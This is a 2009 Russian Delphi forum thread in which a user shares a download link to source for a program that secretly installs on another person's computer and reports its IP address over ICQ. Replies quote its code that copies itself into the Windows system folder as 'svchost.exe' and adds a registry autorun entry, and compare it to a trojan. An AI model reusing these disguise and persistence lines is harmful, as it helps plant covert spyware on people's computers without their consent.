Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 16.10.2009, 22:35   #1
YoraG
Пользователь
 
Регистрация: 06.11.2008
Сообщений: 10
По умолчанию Исходник программы "узнать чужой IP"

Данная программа присылает IP на асю. Для этого нужно с флешки 1 раз запустить прогу на чужом компе, она себя копирует на комп и работает как ася. присылаеш на нее код, а она тебе в ответ на асю IP.
http://depositfiles.com/files/m0yauqpw5
YoraG вне форума Ответить с цитированием
Старый 16.10.2009, 23:13   #2
profi
Участник клуба Подтвердите свой е-майл
 
Регистрация: 19.11.2007
Сообщений: 1,022
По умолчанию

Посмотрим что за исходник
profi вне форума Ответить с цитированием
Старый 17.10.2009, 00:59   #3
Вавел из ГМТУ
Форумчанин
 
Регистрация: 19.06.2009
Сообщений: 896
По умолчанию

Исходничек школяра....

1.

Код:
if not FileExists('c:\WINDOWS\system\svchost.exe') then
   WindowsCopyFile(ExtractFilePath(ParamStr(0))+'svchost.exe','c:\WINDOWS\system\');
2.

Код:
WriteString('Svchost', 'c:\WINDOWS\system\svchost.exe');
3. И размерчик конечно 520 кб для прогораммки, которая светит АПИ жертвы... У меня полнофункциональный троян последней версии написаный на Delphi весит столькоже.

Последний раз редактировалось Вавел из ГМТУ; 17.10.2009 в 01:07.
Вавел из ГМТУ вне форума Ответить с цитированием
Старый 17.10.2009, 09:21   #4
YoraG
Пользователь
 
Регистрация: 06.11.2008
Сообщений: 10
По умолчанию

А ты антивирями его проверял? И что он у тебя выполняет?
YoraG вне форума Ответить с цитированием
Старый 17.10.2009, 13:01   #5
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

Код:
if not FileExists('c:\WINDOWS\system\svchost.exe') then
   WindowsCopyFile(ExtractFilePath(ParamStr(0))+'svchost.exe','c:\WINDOWS\system\');
а у меня б это не сработало
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 17.10.2009, 22:51   #6
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

кажется это мой исходник....или может совпадение
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума Ответить с цитированием
Старый 18.10.2009, 10:01   #7
YoraG
Пользователь
 
Регистрация: 06.11.2008
Сообщений: 10
По умолчанию

Цитата:
Сообщение от betirsolt Посмотреть сообщение
кажется это мой исходник....или может совпадение
Аську написал - ...///PavelOk\\... - (айси кью клиент - это часть моей проги).
Остальное я сам писал.
Посмотри исходник, хочешь сказать это твое??? Ни чего подобного!
YoraG вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
при вводе на листе "магазин"- код товара появлялось "описание" товара из "склада" с "продажной ценой" aleksei78 Microsoft Office Excel 13 25.08.2009 12:04
Как узнать ширину панели "Пуск" Port 111 Win Api 6 01.02.2009 23:05
Исходник игры "судоку" На языке С++ FAk Общие вопросы C/C++ 2 15.05.2008 18:47
"The Bat" - как узнать пароль к E-mail Air Софт 6 01.03.2008 15:42
Где можно найти исходник игры "рулетка" roll Компоненты Delphi 2 15.09.2007 22:09